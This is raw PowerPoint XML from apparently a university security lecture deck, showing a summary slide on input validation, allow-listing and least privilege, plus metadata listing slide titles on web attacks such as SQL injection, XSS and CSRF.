            <a:off x="12605493" y="2847732"/>
            <a:ext cx="10618347" cy="9909303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="558155495"/>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hape 869"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Shape 870"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The source of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> attacks is carefully crafted data fed to the application from the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Common solution idea: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>input validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>ll data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> from the environment should be </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>checked</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>sanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>before it is used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Allow-listing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> preferred to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>bl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ock-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>listing - </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>secure default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Checking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> preferred to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>sanitization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>less to trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Another key idea: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Minimize privilege </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other attacks due to poor specification: Not defining security properly using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authz</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939337456"/>
      </p:ext>
    </p:extLst>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7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8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8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870">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870">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8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8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0" uiExpand="1" build="p" bldLvl="5" animBg="1" advAuto="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3ABD-F644-084F-554F-38DF2FE03C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OLD: Primer on the WWW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F29D164-2AE5-6EB1-2790-3490848220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D918D8-1580-92A6-500A-D25DB62201FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3333324677"/>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3026</TotalTime>
  <Words>7605</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>1197</Paragraphs>
  <Slides>123</Slides>
  <Notes>11</Notes>
  <HiddenSlides>36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123</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="136" baseType="lpstr">
      <vt:lpstr>Amazon Ember Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>White</vt:lpstr>
      <vt:lpstr>Secure Systems Engineering and Management</vt:lpstr>
      <vt:lpstr>What’s a vulnerability?</vt:lpstr>
      <vt:lpstr>Data source: MITRE Top 25 CWEs</vt:lpstr>
      <vt:lpstr>Common Vulnerability Scoring System (CVSS)</vt:lpstr>
      <vt:lpstr>The Internet, in one slide</vt:lpstr>
      <vt:lpstr>RESTful APIs: Beyond browsers</vt:lpstr>
      <vt:lpstr>Common threat: Malicious clients</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>What is a buffer overflow?</vt:lpstr>
      <vt:lpstr>Buffer overflows from 10,000 ft</vt:lpstr>
      <vt:lpstr>Normal interaction</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>What happened?</vt:lpstr>
      <vt:lpstr>Code injection</vt:lpstr>
      <vt:lpstr>Heartbleed: Buffer overread</vt:lpstr>
      <vt:lpstr>Stopping overflow attacks</vt:lpstr>
      <vt:lpstr>Preventing Exploitation</vt:lpstr>
      <vt:lpstr>MITRE Top 25 CWEs</vt:lpstr>
      <vt:lpstr>Quiz 1: What are reasonable assumptions?</vt:lpstr>
      <vt:lpstr>Quiz 1: What are reasonable assumptions?</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Server-side data</vt:lpstr>
      <vt:lpstr>SQL (Standard Query Language)</vt:lpstr>
      <vt:lpstr>Server-side code</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The underlying issue</vt:lpstr>
      <vt:lpstr>The underlying issue</vt:lpstr>
      <vt:lpstr>Defense: Input Validation</vt:lpstr>
      <vt:lpstr>Sanitization: Prepared Statements</vt:lpstr>
      <vt:lpstr>Using prepared statements</vt:lpstr>
      <vt:lpstr>Also: Mitigation</vt:lpstr>
      <vt:lpstr>Quiz 1</vt:lpstr>
      <vt:lpstr>Quiz 1</vt:lpstr>
      <vt:lpstr>Similar attacks via untrusted inputs</vt:lpstr>
      <vt:lpstr>What’s wrong with this Ruby code?</vt:lpstr>
      <vt:lpstr>Possible Interaction</vt:lpstr>
      <vt:lpstr>Quiz 2: What happened?</vt:lpstr>
      <vt:lpstr>Quiz 2: What happened?</vt:lpstr>
      <vt:lpstr>Possible WWW deployment</vt:lpstr>
      <vt:lpstr>Sanitization: Escaping</vt:lpstr>
      <vt:lpstr>Sanitization: Escaping</vt:lpstr>
      <vt:lpstr>Quiz 3: Is this escaping sufficient?</vt:lpstr>
      <vt:lpstr>Quiz 3: Is this escaping sufficient?</vt:lpstr>
      <vt:lpstr>Escaping not always enough</vt:lpstr>
      <vt:lpstr>Path traversal </vt:lpstr>
      <vt:lpstr>Checking: Allow-listing</vt:lpstr>
      <vt:lpstr>Checking: Allow-listing</vt:lpstr>
      <vt:lpstr>Server-Side Request Forgery</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>HTTP is stateless</vt:lpstr>
      <vt:lpstr>Statefulness with cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Requests with cookies</vt:lpstr>
      <vt:lpstr>Cookies and SOP</vt:lpstr>
      <vt:lpstr>URLs with side effects</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>CSRF protections: REFERER</vt:lpstr>
      <vt:lpstr>Problem: Referrer optional</vt:lpstr>
      <vt:lpstr>CSRF Protection: Secretized Links</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Dynamic web pages</vt:lpstr>
      <vt:lpstr>What could go wrong?</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>XSS: Subverting the SOP</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Planting a bomb</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Samy the hacker</vt:lpstr>
      <vt:lpstr>Related: Deserialization</vt:lpstr>
      <vt:lpstr>Related: Unrestricted file upload</vt:lpstr>
      <vt:lpstr>Quiz 4</vt:lpstr>
      <vt:lpstr>Quiz 4</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Echoed input</vt:lpstr>
      <vt:lpstr>Exploiting echoed input</vt:lpstr>
      <vt:lpstr>Reflected XSS Summary</vt:lpstr>
      <vt:lpstr>Quiz 5</vt:lpstr>
      <vt:lpstr>Quiz 5</vt:lpstr>
      <vt:lpstr>XSS Defense: Filter/Escape</vt:lpstr>
      <vt:lpstr>Problem: Finding the Content</vt:lpstr>
      <vt:lpstr>Better defense: Allow list</vt:lpstr>
      <vt:lpstr>MITRE Top 25 Common Weakness Enumeration</vt:lpstr>
      <vt:lpstr>MITRE Top 25 Common Weakness Enumeration</vt:lpstr>
      <vt:lpstr>Missing Authentication</vt:lpstr>
      <vt:lpstr>Missing/Incorrect/Bypassed Authorization</vt:lpstr>
      <vt:lpstr>Cedar:</vt:lpstr>
      <vt:lpstr>BodySnatcher CVE-2025-12420</vt:lpstr>
      <vt:lpstr>BodySnatcher exploit</vt:lpstr>
      <vt:lpstr>Security Triad</vt:lpstr>
      <vt:lpstr>OWASP Top 10</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>OLD: Primer on the WWW</vt:lpstr>
      <vt:lpstr>Interception</vt:lpstr>
      <vt:lpstr>Aside: Crypto is amazing</vt:lpstr>
      <vt:lpstr>How are keys used with TLS?</vt:lpstr>
      <vt:lpstr>Verifying certificates</vt:lpstr>
      <vt:lpstr>Verifying certificates</vt:lpstr>
      <vt:lpstr>Verifying certificates</vt:lpstr>
      <vt:lpstr>Interacting with web servers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTP GET requests</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTP POST requests</vt:lpstr>
      <vt:lpstr>Basic structure of web traffic</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web-based State using Hidden Fields and Cookies</vt:lpstr>
      <vt:lpstr>Maintaining State</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Solution: Capabilities</vt:lpstr>
      <vt:lpstr>Using capabilities</vt:lpstr>
      <vt:lpstr>Using capabilities</vt:lpstr>
      <vt:lpstr>Cookie Theft</vt:lpstr>
      <vt:lpstr>Key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Security In (RECORD THIS)</dc:title>
  <cp:lastModifiedBy>Hicks, Michael W</cp:lastModifiedBy>
  <cp:revision>174</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-20T14:07:30Z</dcterms:modified>
</cp:coreProperties>
</file>